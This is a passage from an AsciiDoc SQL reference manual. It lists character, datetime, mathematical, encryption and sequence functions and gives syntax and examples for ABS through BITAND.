include\r\na GROUP BY clause but you specify an aggregate function in the select\r\nlist, all rows of the SELECT result table form the one and only group.\r\n\r\nSee the individual entry for the function.\r\n\r\n[[character_string_functions]]\r\n== Character String Functions\r\n\r\nThese functions manipulate character strings and use a character value\r\nexpression as an argument or return a result of a character data type.\r\nCharacter string functions treat each single-byte or multi-byte character\r\nin an input string as one character, regardless of the byte length of\r\nthe character.\r\n\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<ascii_function,ASCII Function>> | Returns the ASCII code value of the first character of a character value\r\nexpression.\r\n| <<char_function,CHAR Function>> | Returns the specified code value in a character set.\r\n| <<char_length_function,CHAR_LENGTH Function>> | Returns the number of characters in a string. You can also use\r\nCHARACTER_LENGTH.\r\n| <<code_value_function,CODE_VALUE Function>> | Returns an unsigned integer that is the code point of the first\r\ncharacter in a character value expression that can be associated with\r\none of the supported character sets.\r\n| <<concat_function,CONCAT Function>> | Returns the concatenation of two character value expressions as a string\r\nvalue. You can also use the concatenation operator (\\|\\|).\r\n| <<insert_function,INSERT Function>> | Returns a character string where a specified number of characters within\r\nthe character string have been deleted and then a second character\r\nstring has been inserted at a specified start position.\r\n| <<lcase_function,LCASE Function>> | Down-shifts alphanumeric characters. You can also use LOWER.\r\n| <<left_function,LEFT Function>> | Returns the leftmost specified number of characters from a character expression.\r\n| <<locate_function,LOCATE Function>> | Returns the position of a specified substring within a character string.\r\nYou can also use POSITION.\r\n| <<lower_function,LOWER Function>> | Down-shifts alphanumeric characters. You can also use LCASE.\r\n| <<lpad_function,LPAD Function>> | Replaces the leftmost specified number of characters in a character\r\nexpression with a padding character.\r\n| <<ltrim_function,LTRIM Function>> | Removes leading spaces from a character string.\r\n| <<octet_length_function,OCTET_LENGTH Function>> | Returns the length of a character string in bytes.\r\n| <<position_function,POSITION Function>> | Returns the position of a specified substring within a character string.\r\nYou can also use LOCATE.\r\n| <<repeat_function,REPEAT Function>> | Returns a character string composed of the evaluation of a character\r\nexpression repeated a specified number of times.\r\n| <<replace_function,REPLACE Function>> | Returns a character string where all occurrences of a specified\r\ncharacter string in the original string are replaced with another\r\ncharacter string.\r\n| <<right_function,RIGHT Function>> | Returns the rightmost specified number of characters from a character\r\nexpression.\r\n| <<rpad_function,RPAD Function>> | Replaces the rightmost specified number of characters in a character\r\nexpression with a padding character.\r\n| <<rtrim_function,RTRIM Function>> | Removes trailing spaces from a character string.\r\n| <<space_function,SPACE Function>> | Returns a character string consisting of a specified number of spaces.\r\n| <<substring_function,SUBSTRING\/SUBSTR Function>> | Extracts a substring from a character string.\r\n| <<translate_function,TRANSLATE Function>> | Translates a character string from a source character set to a target\r\ncharacter set.\r\n| <<trim_function,TRIM Function>> | Removes leading or trailing characters from a character string.\r\n| <<ucase_function,UCASE Function>> | Up-shifts alphanumeric characters. You can also use UPSHIFT or UPPER.\r\n| <<upper_function,UPPER Function>> | Up-shifts alphanumeric characters. You can also use UPSHIFT or UCASE.\r\n| <<upshift_function,UPSHIFT Function>> | Up-shift alphanumeric characters. You can also use UPPER or UCASE.\r\n|===\r\n\r\nSee the individual entry for the function.\r\n\r\n[[datetime_functions]]\r\n== Datetime Functions\r\n\r\nThese functions use either a datetime value expression as an argument or\r\nreturn a result of datetime data type:\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<add_months_function,ADD_MONTHS Function>> | Adds the integer number of months specified by _intr_expr_ \r\nto _datetime_expr_ and normalizes the result.\r\n| <<converttimestamp_function,CONVERTTIMESTAMP Function>> | Converts a Julian timestamp to a TIMESTAMP value.\r\n| <<current_function,CURRENT Function>> | Returns the current timestamp. You can also use the\r\n<<current_timestamp_function,CURRENT_TIMESTAMP Function>>. \r\n| <<current_date_function,CURRENT_DATE Function>> | Returns the current date.\r\n| <<current_time_function,CURRENT_TIME Function>> | Returns the current time.\r\n| <<current_timestamp_function,CURRENT_TIMESTAMP Function>> | Returns the current timestamp. You can also use the <<current_function,CURRENT Function>>.\r\n| <<date_add_function,DATE_ADD Function>> | Adds the interval specified by _interval_expression_\r\nto _datetime_expr_.\r\n| <<date_part_function_of_an_interval,DATE_PART Function (of an Interval)>> | Extracts the datetime field specified by _text_ from the interval value\r\nspecified by interval and returns the result as an exact numeric value.\r\n| <<date_part_function_of_a_timestamp,DATE_PART Function (of a Timestamp)>> | Extracts the datetime field specified by _text_ from the datetime value\r\nspecified by timestamp and returns the result as an exact numeric value.\r\n| <<date_sub_function,DATE_SUB Function>> | Subtracts the specified _interval_expression_ from\r\n_datetime_expr._\r\n| <<date_trunc_function,DATE_TRUNC Function>> | Returns the date with the time portion of the day truncated.\r\n| <<dateadd_function,DATEADD Function>> | Adds the interval specified by _datepart_ and _num_expr_\r\nto _datetime_expr_.\r\n| <<datediff_function,DATEDIFF Function>> | Returns the integer value for the number of _datepart_ units of time\r\nbetween _startdate_ and _enddate_.\r\n| <<dateformat_function,DATEFORMAT Function>> | Formats a datetime value for display purposes.\r\n| <<day_function,DAY Function>> | Returns an integer value in the range 1 through 31 that represents the\r\ncorresponding day of the month. You can also use DAYOFMONTH.\r\n| <<dayname_function,DAYNAME Function>> | Returns the name of the day of the week from a date or timestamp\r\nexpression.\r\n| <<dayofmonth_function,DAYOFMONTH Function>> | Returns an integer value in the range 1 through 31 that represents the\r\ncorresponding day of the month. You can also use DAY.\r\n| <<dayofweek_function,DAYOFWEEK Function>> | Returns an integer value in the range 1 through 7 that represents the\r\ncorresponding day of the week.\r\n| <<dayofyear_function,DAYOFYEAR Function>> | Returns an integer value in the range 1 through 366 that represents the\r\ncorresponding day of the year.\r\n| <<extract_function,EXTRACT Function>> | Returns a specified datetime field from a datetime value expression or\r\nan interval value expression.\r\n| <<hour_function,HOUR Function>> | Returns an integer value in the range 0 through 23 that represents the\r\ncorresponding hour of the day.\r\n| <<juliantimestamp_function,JULIANTIMESTAMP Function>> | Converts a datetime value to a Julian timestamp.\r\n| <<minute_function,MINUTE Function>> | Returns an integer value in the range 0 through 59 that represents the\r\ncorresponding minute of the hour.\r\n| <<month_function,MONTH Function>> | Returns an integer value in the range 1 through 12 that represents the\r\ncorresponding month of the year.\r\n| <<monthname_function,MONTHNAME Function>> | Returns a character literal that is the name of the month of the year\r\n(January, February, and so on).\r\n| <<quarter_function,QUARTER Function>> | Returns an integer value in the range 1 through 4 that represents the\r\ncorresponding quarter of the year.\r\n| <<second_function,SECOND Function>> | Returns an integer value in the range 0 through 59 that represents the\r\ncorresponding second of the minute.\r\n| <<timestampadd_function,TIMESTAMPADD Function>> | Adds the interval of time specified by _interval-ind_ and\r\n_num_expr_ to _datetime_expr_.\r\n| <<timestampdiff_function,TIMESTAMPDIFF Function>> | Returns the integer value for the number of _interval-ind_\r\nunits of time between _startdate_ and _enddate_.\r\n| <<week_function,WEEK Function>> | Returns an integer value in the range 1 through 54 that represents the\r\ncorresponding week of the year.\r\n| <<year_function,YEAR Function>> | Returns an integer value that represents the year.\r\n|===\r\n\r\nSee the individual entry for the function.\r\n\r\n[[mathematical_functions]]\r\n== Mathematical Functions\r\n\r\nUse these mathematical functions within an SQL numeric value expression:\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<abs_function,ABS Function>> | Returns the absolute value of a numeric value expression. \r\n| <<acos_function,ACOS Function>> | Returns the arccosine of a numeric value expression as an angle expressed in radians.\r\n| <<asin_function,ASIN Function>> | Returns the arcsine of a numeric value expression as an angle expressed in radians.\r\n| <<atan_function,ATAN Function>> | Returns the arctangent of a numeric value expression as an angle expressed in radians.\r\n| <<atan2_function,ATAN2 Function>> | Returns the arctangent of the x and y coordinates, specified by two numeric value expressions, as an angle expressed in radians.\r\n| <<ceiling_function,CEILING Function>> | Returns the smallest integer greater than or equal to a numeric value expression.\r\n| <<cos_function,COS Function>> | Returns the cosine of a numeric value expression, where the expression is an angle expressed in radians.\r\n| <<crc32_function,CRC32 Function>> | Returns CRC32 checksum\r\n| <<cosh_function,COSH Function>> | Returns the hyperbolic cosine of a numeric value expression, where the expression is an angle expressed in radians.\r\n| <<degrees_function,DEGREES Function>> | Converts a numeric value expression expressed in radians to the number of degrees.\r\n| <<exp_function,EXP Function>> | Returns the exponential value (to the base e) of a numeric value expression.\r\n| <<floor_function,FLOOR Function>> | Returns the largest integer less than or equal to a numeric value expression.\r\n| <<log_function,LOG Function>> | Returns the natural logarithm of a numeric value expression.\r\n| <<log10_function,LOG10 Function>> | Returns the base 10 logarithm of a numeric value expression.\r\n| <<mod_function,MOD Function>> | Returns the remainder (modulus) of an integer value expression divided by an integer value expression.\r\n| <<nullifzero_function,NULLIFZERO Function>> | Returns the value of the operand unless it is zero, in which case it returns NULL.\r\n| <<pi_function,PI Function>> | Returns the constant value of pi as a floating-point value.\r\n| <<power_function,POWER Function>> | Returns the value of a numeric value expression raised to the power of an integer value expression. You can also use the exponential operator \\*\\*.\r\n| <<radians_function,RADIANS Function>> | Converts a numeric value expression expressed in degrees to the number of radians.\r\n| <<round_function,ROUND Function>> | Returns the value of _numeric_expr_ round to _num_ places to the right of the decimal point.\r\n| <<sign_function,SIGN Function>> | Returns an indicator of the sign of a numeric value expression. If value is less than zero, returns -1 as the indicator. If value is zero,\r\nreturns 0. If value is greater than zero, returns 1.\r\n| <<sin_function,SIN Function>> | Returns the sine of a numeric value expression, where the expression is an angle expressed in radians.\r\n| <<sinh_function,SINH Function>> | Returns the hyperbolic sine of a numeric value expression, where the expression is an angle expressed in radians.\r\n| <<sqrt_function,SQRT Function>> | Returns the square root of a numeric value expression.\r\n| <<tan_function,TAN Function>> | Returns the tangent of a numeric value expression, where the expression is an angle expressed in radians.\r\n| <<tanh_function,TANH Function>> | Returns the hyperbolic tangent of a numeric value expression, where the expression is an angle expressed in radians.\r\n| <<zeroifnull_function,ZEROIFNULL Function>> | Returns the value of the operand unless it is NULL, in which case it returns zero.\r\n|===\r\n\r\nSee the individual entry for the function.\r\n\r\n[[encryption_functions]]\r\n == Encryption Functions\r\n Use these functions within an SQL value expression to do data encryption or hashing:\r\n \r\n [cols=\"25%,75%\"]\r\n |===\r\n | <<md5_function,MD5 Function>> | Returns MD5 checksum\r\n | <<sha_function,SHA Function>> | Returns SHA-1 160-bit checksum\r\n | <<sha2_function,SHA2 Function>> | Returns SHA-2 checksum\r\n |===\r\n\r\n[[sequence_functions]]\r\n== Sequence Functions\r\n\r\nSequence functions operate on ordered rows of the intermediate result\r\ntable of a SELECT statement that includes a SEQUENCE BY clause. Sequence\r\nfunctions are categorized generally as difference, moving, offset, or\r\nrunning.\r\n\r\nSome sequence functions, such as ROWS SINCE, require sequentially\r\nexamining every row in the history buffer until the result is computed.\r\nExamining a large history buffer in this manner for a condition that has\r\nnot been true for many rows could be an expensive operation. In\r\naddition, such operations may not be parallelized because the entire\r\nsorted result set must be available to compute the result of the\r\nsequence function.\r\n\r\n[[difference_sequence_functions]]\r\n=== Difference sequence functions\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<diff1_function,DIFF1 Function>> | Calculates differences between values of a column expression in the current row and previous rows.\r\n| <<diff2_function,DIFF2 Function>> | Calculates differences between values of the result of DIFF1 of the current row and DIFF1 of previous rows.\r\n|===\r\n\r\n[[moving_sequence_functions]]\r\n=== Moving sequence functions\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<movingcount_function,MOVINGCOUNT Function>> | Returns the number of non-null values of a column expression in the current window.\r\n| <<movingmax_function,MOVINGMAX Function>> | Returns the maximum of non-null values of a column expression in the current window.\r\n| <<movingmin_function,MOVINGMIN Function>> | Returns the minimum of non-null values of a column expression in the current window.\r\n| <<movingstddev_function,MOVINGSTDDEV Function>> | Returns the standard deviation of non-null values of a column expression in the current window.\r\n| <<movingsum_function,MOVINGSUM Function>> | Returns the sum of non-null values of a column expression in the current window.\r\n| <<movingvariance_function,MOVINGVARIANCE Function>> | Returns the variance of non-null values of a column expression in the current window.\r\n|===\r\n\r\nOffset sequence function\r\n=== Offset sequence function\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<offset_function,OFFSET Function>> | Retrieves columns from previous rows.\r\n|===\r\n\r\n<<<\r\n[[running_sequence_functions]]\r\n=== Running sequence functions\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<runningavg_function,RUNNINGAVG Function>> | Returns the average of non-null values of a column expression up to and including the current row.\r\n| <<runningcount_function,RUNNINGCOUNT Function>> | Returns the number of rows up to and including the current row.\r\n| <<runningmax_function,RUNNINGMAX Function>> | Returns the maximum of values of a column expression up to and including the current row.\r\n| <<runningmin_function,RUNNINGMIN Function>> | Returns the minimum of values of a column expression up to and including the current row.\r\n| <<runningrank_function,RUNNINGRANK Function>> | Returns the rank of the given value of an intermediate result table ordered by a SEQUENCE BY clause in a SELECT statement.\r\n| <<runningstddev_function,RUNNINGSTDDEV Function>> | Returns the standard deviation of non-null values of a column expression up to and including the current row.\r\n| <<runningsum_function,RUNNINGSUM Function>> | Returns the sum of non-null values of a column expression up to and including the current row.\r\n| <<runningvariance_function,RUNNINGVARIANCE Function>> | Returns the variance of non-null values of a column expression up to and including the current row.\r\n|===\r\n\r\n[[other_sequence_functions]]\r\n=== Other sequence functions\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<lastnotnull_function,LASTNOTNULL Function>> | Returns the last non-null value for the specified column expression. If only null values have been returned, returns null.\r\n| <<rows_since_function,ROWS SINCE Function>> | Returns the number of rows counted since the specified condition was last true.\r\n| <<rows_since_changed_function,ROWS SINCE CHANGED Function>> | Returns the number of rows counted since the specified set of values last changed.\r\n| <<this_function,THIS Function>> | Used in ROWS SINCE to distinguish between the value of the column in the current row and the value of the column in previous rows.\r\n|===\r\n\r\nSee <<sequence_by_clause,SEQUENCE BY Clause>> and the individual entry for each function.\r\n\r\n<<<\r\n[[other_functions_and_expressions]]\r\n== Other Functions and Expressions\r\n\r\nUse these other functions and expressions in an SQL value expression:\r\n\r\n\r\n[cols=\"25%,75%\"]\r\n|===\r\n| <<authname_function,AUTHNAME Function>> | Returns the authorization name associated with the specified authorization ID number.\r\n| <<bitand_function,BITAND Function>> | Performs 'and' operation on corresponding bits of the two operands.\r\n| <<case_expression,CASE (Conditional) Expression>> | A conditional expression. The two forms of the CASE expression are simple and searched.\r\n| <<cast_expression,CAST Expression>> | Converts a value from one data type to another data type that you specify.\r\n| <<coalesce_function,COALESCE Function>> | Returns the value of the first expression in the list that does not have a NULL value or if all \r\nthe expressions have NULL values, the function returns a NULL value.\r\n| <<converttohex_function,CONVERTTOHEX Function>> | Converts the specified value expression to hexadecimal for display purposes.\r\n| <<current_user_function,CURRENT_USER Function>> | Returns the database user name of the current user who invoked the function.\r\n| <<decode_function,DECODE Function>> | Compares _expr_ to each _test_expr_ value one by one in the order provided.\r\n| <<explain_function,EXPLAIN Function>> | Generates a result table describing an access plan for a SELECT, INSERT, DELETE, or UPDATE statement.\r\n| <<isnull_function,ISNULL Function>> | Returns the first argument if it is not null, otherwise it returns the second argument.\r\n| <<is_ipv4_function, IS_IPV4 Function>> | Returns 1 if the argument is a valid IPv4 address specified as a string, 0 otherwise.\r\n| <<is_ipv6_function, IS_IPV6 Function>> | Returns 1 if the argument is a valid IPv6 address specified as a string, 0 otherwise.\r\n| <<inet_aton_function, INET_ATON Function>> | Given the dotted-quad representation of an IPv4 network address as a string, returns an integer that represents the numeric value of the address in network byte order (big endian). INET_ATON() returns NULL if it does not understand its argument.\r\n| <<inet_ntoa_function, INET_NTOA Function>> | Given a numeric IPv4 network address in network byte order, returns the dotted-quad string representation of the address as a nonbinary string in the connection character set. INET_NTOA() returns NULL if it does not understand its argument.\r\n| <<nullif_function,NULLIF Function>> | Returns the value of the first operand if the two operands are not equal, otherwise it returns NULL.\r\n| <<nvl_function,NVL Function>> | Returns the value of the first operand unless it is NULL, in which case it returns the value of the second operand.\r\n| <<user_function,USER Function>> | Returns either the database user name of the current user who invoked the function or the database user name \r\nassociated with the specified user ID number.\r\n|===\r\n\r\nSee the individual entry for the function.\r\n\r\n<<<\r\n[[abs_function]]\r\n== ABS Function\r\n\r\nThe ABS function returns the absolute value of a numeric value\r\nexpression. ABS is a {project-name} SQL extension.\r\n\r\n```\r\nABS (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the ABS function. The result is returned as an unsigned\r\nnumeric value if the precision of the argument is less than 10 or as a\r\nLARGEINT if the precision of the argument is greater than or equal to\r\n10. See <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_abs]]\r\n=== Examples of ABS\r\n\r\n* This function returns the value 8:\r\n+\r\n```\r\nABS (-20 + 12)\r\n```\r\n\r\n<<<\r\n[[acos_function]]\r\n== ACOS Function\r\n\r\nThe ACOS function returns the arccosine of a numeric value expression as\r\nan angle expressed in radians.\r\n\r\nACOS is a {project-name} SQL extension. \r\n\r\n```\r\nACOS (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the ACOS function. The range for the value of the argument is \r\nfrom -1 to +1. See <<numeric_value_expressions,Numeric Value_Expressions>>.\r\n\r\n[[examples_of_acos]]\r\n=== Examples of ACOS\r\n\r\n* The ACOS function returns the value 3.49044274380724416E-001 or\r\napproximately 0.3491 in radians (which is 20 degrees).\r\n+\r\n```\r\nACOS (0.9397)\r\n```\r\n\r\n* This function returns the value 0.3491. The function ACOS is the\r\ninverse of the function COS.\r\n+\r\n```\r\nACOS (COS (0.3491))\r\n```\r\n\r\n<<<\r\n[[add_months_function]]\r\n=== ADD_MONTHS Function\r\n\r\nThe ADD_MONTHS function adds the integer number of months specified by\r\n_int_expr_ to _datetime_expr_ and normalizes the result. ADD_MONTHS is a {project-name} SQL\r\nextension.\r\n\r\n```\r\nADDMONTHS (datetimeexpr, intexpr [, int2 ])\r\n```\r\n\r\n* `_datetime_expr_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. The return value is the same type as the _datetime_expr._ See\r\n<<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n* `_int_expr_`\r\n+\r\nis an SQL numeric value expression of data type SMALLINT or INTEGER that\r\nspecifies the number of months. See <<numeric_value_expressions,\r\nNumeric Value Expressions>>.\r\n\r\n* `_int2_`\r\n+\r\nis an unsigned integer constant. If _int2_ is omitted or is the literal\r\n0, the normalization is the standard normalization. If _int2_ is the\r\nliteral 1, the normalization includes the standard normalization and if\r\nthe starting day (the day part of _datetime_expr_) is the last day of\r\nthe starting month, then the ending day (the day part of the result\r\nvalue) is set to the last valid day of the result month. See\r\n<<standard_normalization,Standard Normalization>>. See\r\n<<numeric_value_expressions,Numeric Value Expressions>> .\r\n\r\n<<<\r\n[[examples_of_add_months]]\r\n=== Examples of ADD_MONTHS\r\n\r\n* This function returns the value DATE '2007-03-31':\r\n+\r\n```\r\nADD_MONTHS(DATE '2007-02-28', 1, 1)\r\n```\r\n\r\n* This function returns the value DATE '2007-03-28':\r\n+\r\n```\r\nADD_MONTHS(DATE '2007-02-28', 1, 0)\r\n```\r\n\r\n* This function returns the value DATE '2008-03-28':\r\n+\r\n```\r\nADD_MONTHS(DATE '2008-02-28', 1, 1)\r\n```\r\n\r\n* This function returns the timestamp '2009-02-28 00:00:00':\r\n+\r\n```\r\nADD_MONTHS(timestamp'2008-02-29 00:00:00',12,1)\r\n```\r\n\r\n<<<\r\n[[ascii_function]]\r\n== ASCII Function\r\n\r\nThe ASCII function returns the integer that is the ASCII code of the\r\nfirst character in a character string expression associated with either\r\nthe ISO8891 character set or the UTF8 character set.\r\n\r\nASCII is a {project-name} SQL extension.\r\n\r\n```\r\nASCII (character-expression) \r\n```\r\n\r\n* `_character-expression`\r\n+\r\nis an SQL character value expression that specifies a string of\r\ncharacters. See <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[considerations_for_ascii]]\r\n=== Considerations For ASCII\r\n\r\nFor a string expression in the UTF8 character set, if the value of the\r\nfirst byte in the string is greater than 127, {project-name} SQL returns this\r\nerror message:\r\n\r\n```\r\nERROR[8428] The argument to function ASCII is not valid.\r\n```\r\n\r\n[[examples_of_ascii]]\r\n=== Examples of ASCII\r\n\r\n* Select the column JOBDESC and return the ASCII code of the first\r\ncharacter of the job description:\r\n+\r\n```\r\nSELECT jobdesc, ASCII (jobdesc) FROM persnl.job;\r\n\r\nJOBDESC (EXPR)\r\n----------------- --------\r\nMANAGER 77\r\nPRODUCTION SUPV 80\r\nASSEMBLER 65\r\nSALESREP 83\r\n... ...\r\n\r\n--- 10 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[asin_function]]\r\n== ASIN Function\r\n\r\nThe ASIN function returns the arcsine of a numeric value expression as\r\nan angle expressed in radians.\r\n\r\nASIN is a {project-name} SQL extension.\r\n\r\n```\r\nASIN (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the ASIN function. The range for the value of the argument is\r\nfrom -1 to +1. See <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[considerations_for_ascii]]\r\n=== Considerations for ASCII\r\n\r\nFor a string expression in the UTF8 character set, if the value of the\r\nfirst byte in the string is greater than 127, {project-name} SQL returns this\r\nerror message:\r\n\r\n```\r\nERROR[8428] The argument to function ASCII is not valid.\r\n```\r\n\r\n[[examples_of_ascii]]\r\n=== Examples of ASCII\r\n\r\n* Select the column JOBDESC and return the ASCII code of the first\r\ncharacter of the job description:\r\n+\r\n```\r\nSELECT jobdesc, ASCII (jobdesc) FROM persnl.job;\r\n\r\nJOBDESC (EXPR)\r\n----------------- --------\r\nMANAGER 77\r\nPRODUCTION SUPV 80\r\nASSEMBLER 65\r\nSALESREP 83\r\n... ...\r\n\r\n--- 10 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[asin_function]]\r\n== ASIN Function\r\n\r\nThe ASIN function returns the arcsine of a numeric value expression as\r\nan angle expressed in radians.\r\n\r\nASIN is a {project-name} SQL extension.\r\n\r\n```\r\nASIN (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the ASIN function. The range for the value of the argument\r\nis from -1 to +1. See <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_asin]]\r\n=== Examples of ASIN\r\n\r\n* This function returns the value 3.49044414403046400e-001 or\r\napproximately 0.3491 in radians (which is 20 degrees):\r\n+\r\n```\r\nASIN(0.3420)\r\n```\r\n\r\n* This function returns the value 0.3491. The function ASIN is the\r\ninverse of the function SIN.\r\n+\r\n```\r\nASIN(SIN(0.3491))\r\n```\r\n\r\n<<<\r\n[[atan_function]]\r\n== ATAN Function\r\n\r\nThe ATAN function returns the arctangent of a numeric value expression\r\nas an angle expressed in radians.\r\n\r\nATAN is a {project-name} SQL extension.\r\n\r\n```\r\nATAN ( numeric-expression )\r\n```\r\n\r\n* `_numeric-expression _`\r\n\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the atan function. See <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_atan]]\r\n=== Examples of ATAN\r\n\r\n* This function returns the value 8.72766423249958272E-001 or\r\napproximately 0.8727 in radians (which is 50 degrees):\r\n+\r\n```\r\nATAN (1.192)\r\n```\r\n\r\n* This function returns the value 0.8727. The function ATAN is the\r\ninverse of the function TAN.\r\n+\r\n```\r\nATAN (TAN (0.8727))\r\n```\r\n\r\n<<<\r\n[[atan2_function]]\r\n== ATAN2 Function\r\n\r\nThe ATAN2 function returns the arctangent of the x and y coordinates,\r\nspecified by two numeric value expressions, as an angle expressed in\r\nradians.\r\n\r\nATAN2 is a {project-name} SQL extension.\r\n\r\n```\r\nATAN2 (numeric-expression-x,numeric-expression-y)\r\n```\r\n\r\n* `_numeric-expression-x_, _numeric-expression-y_`\r\n\r\nare SQL numeric value expressions that specify the value for the x and y\r\ncoordinate arguments of the ATAN2 function. See\r\n<<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_atan2]]\r\n=== Examples of ATAN2\r\n\r\n* This function returns the value 2.66344329881899520E+000, or\r\napproximately 2.6634:\r\n+\r\n```\r\nATAN2 (1.192,-2.3)\r\n```\r\n\r\n<<<\r\n[[authname_function]]\r\n== AUTHNAME Function\r\n\r\nThe AUTHNAME function returns the name of the authorization ID that is\r\nassociated with the specified authorization ID number.\r\n\r\n```\r\nAUTHNAME (auth-id)\r\n```\r\n\r\n* `_auth-id_`\r\n+\r\nis the 32-bit number associated with an authorization ID. See\r\n<<authorization_ids,Authorization IDs>>.\r\n\r\nThe AUTHNAME function is similar to the <<user function,USER Function>>.\r\n\r\n[[considerations_for_authname]]\r\n=== Considerations for AUTHNAME\r\n\r\n* This function can be specified only in the top level of a SELECT statement.\r\n* The value returned is string data type VARCHAR(128) and is in ISO8859-1 encoding.\r\n\r\n[[examples_of_authname]]\r\n=== Examples of AUTHNAME\r\n\r\n* This example shows the authorization name associated with the\r\nauthorization ID number, 33333:\r\n+\r\n```\r\n>>SELECT AUTHNAME (33333) FROM (values(1)) x(a);\r\n\r\n(EXPR)\r\n-------------------------\r\nDB ROOT\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[avg_function]]\r\n== AVG Function\r\n\r\nAVG is an aggregate function that returns the average of a set of\r\nnumbers.\r\n\r\n```\r\nAVG ([ALL | DISTINCT] expression)\r\n```\r\n\r\n* `ALL | DISTINCT`\r\n+\r\nspecifies whether duplicate values are included in the computation of\r\nthe AVG of the _expression_. The default option is ALL, which causes\r\nduplicate values to be included. If you specify DISTINCT, duplicate\r\nvalues are eliminated before the AVG function is applied.\r\n\r\n* `_expression_`\r\n+\r\nspecifies a numeric or interval value _expression_ that determines the\r\nvalues to average. The _expression_ cannot contain an aggregate function\r\nor a subquery. The DISTINCT clause specifies that the AVG function\r\noperates on distinct values from the one-column table derived from the\r\nevaluation of _expression_.\r\n\r\nSee <<numeric_value_expressions,Numeric Value Expressions>> and\r\n<<interval_value_expressions,Interval Value Expressions>>.\r\n\r\n[[considerations_for_avg]]\r\n=== Considerations for AVG\r\n\r\n[[data-type-of-the-result]]\r\n==== Data Type of the Result\r\n\r\nThe data type of the result depends on the data type of the argument. If\r\nthe argument is an exact numeric type, the result is LARGEINT. If the\r\nargument is an approximate numeric type, the result\r\nis DOUBLE PRECISION. If the argument is INTERVAL data type, the result\r\nis INTERVAL with the same precision as the argument.\r\n\r\nThe scale of the result is the same as the scale of the argument. If the\r\nargument has no scale, the result is truncated.\r\n\r\n\r\n[[operands-of-the-expression]]\r\n==== Operands of the Expression\r\n\r\nThe expression includes columns from the rows of the SELECT result table but\r\ncannot include an aggregate function. These expressions are valid:\r\n\r\n```\r\nAVG (SALARY)\r\nAVG (SALARY * 1.1)\r\nAVG (PARTCOST * QTY_ORDERED)\r\n```\r\n\r\n[[avg_nulls]]\r\n==== Nulls\r\n\r\nAll nulls are eliminated before the function is applied to the set of\r\nvalues. If the result table is empty, AVG returns NULL.\r\n\r\n[[examples_of_avg]]\r\n==== Examples of AVG\r\n\r\n* Return the average value of the SALARY column:\r\n+\r\n```\r\nSELECT AVG (salary) FROM persnl.employee;\r\n\r\n(EXPR)\r\n---------------------\r\n 49441.52\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n* Return the average value of the set of unique SALARY values:\r\n+\r\n```\r\nSELECT AVG(DISTINCT salary) AS Avg_Distinct_Salary FROM persnl.employee;\r\n\r\nAVG_DISTINCT_SALARY\r\n---------------------\r\n 53609.89\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n* Return the average salary by department:\r\n+\r\n```\r\nSELECT deptnum, AVG (salary) AS \"AVERAGE SALARY\"\r\nFROM persnl.employee\r\nWHERE deptnum < 3000 GROUP BY deptnum;\r\n\r\nDept\/Num \"AVERAGE SALARY\"\r\n-------- ---------------------\r\n 1000 52000.17\r\n 2000 50000.10\r\n 1500 41250.00\r\n 2500 37000.00\r\n\r\n--- 4 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[bitand_function]]\r\n== BITAND Function\r\n\r\nThe BITAND function performs an AND operation on corresponding bits of\r\nthe two operands. If both bits are 1, the result bit is 1. Otherwise the\r\nresult bit is 0.\r\n\r\n```\r\nBITAND (expression, expression)\r\n```\r\n\r\n* `_expression_`\r\n+\r\nThe result data type is a binary number. Depending on the precision of\r\nthe operands, the data type of the result can either be an INT (32-bit\r\ninteger) or a LARGEINT (64-bit integer).\r\n+\r\nIf the max precision of either operand is greater than 9, LARGEINT is\r\nchosen (numbers with precision greater than 9 are represented by\r\nLARGEINT). Otherwise, INT is chosen.\r\n+\r\nIf both operands are unsigned, the result is unsigned. Otherwise, the\r\nresult is signed. Both operands are converted to the result data type\r\nbefore performing the bit operation.\r\n\r\n[[considerations_for_bitand]]\r\n=== Considerations for BITAND\r\n\r\nBITAND can be used anywhere in an SQL query where an expression could be\r\nused. This includes SELECT lists, WHERE predicates, VALUES clauses, SET\r\nstatement, and so on.\r\n\r\nThis function returns a numeric data type and can be used in arithmetic\r\nexpressions.\r\n\r\nNumeric operands can be positive or negative numbers. All numeric data\r\ntypes are allowed with the exceptions listed in the\r\n<<restrictions_for_bitand,Restrictions for BITAND>> section.\r\n\r\n[[restrictions_for_bitand]]\r\n==== Restrictions for BITAND\r\n\r\nThe following are BITAND restrictions:\r\n\r\n* Must have two operands\r\n* Operands must be binary or decimal exact numerics\r\n* Operands must have scale of zero\r\n* Operands cannot be floating point numbers\r\n* Operands cannot be an extended precision numeric (the maximum precision of an extended numeric data type is 128)\r\n\r\n\r\n[[examples_of_bitand]]\r\n=== Examples of 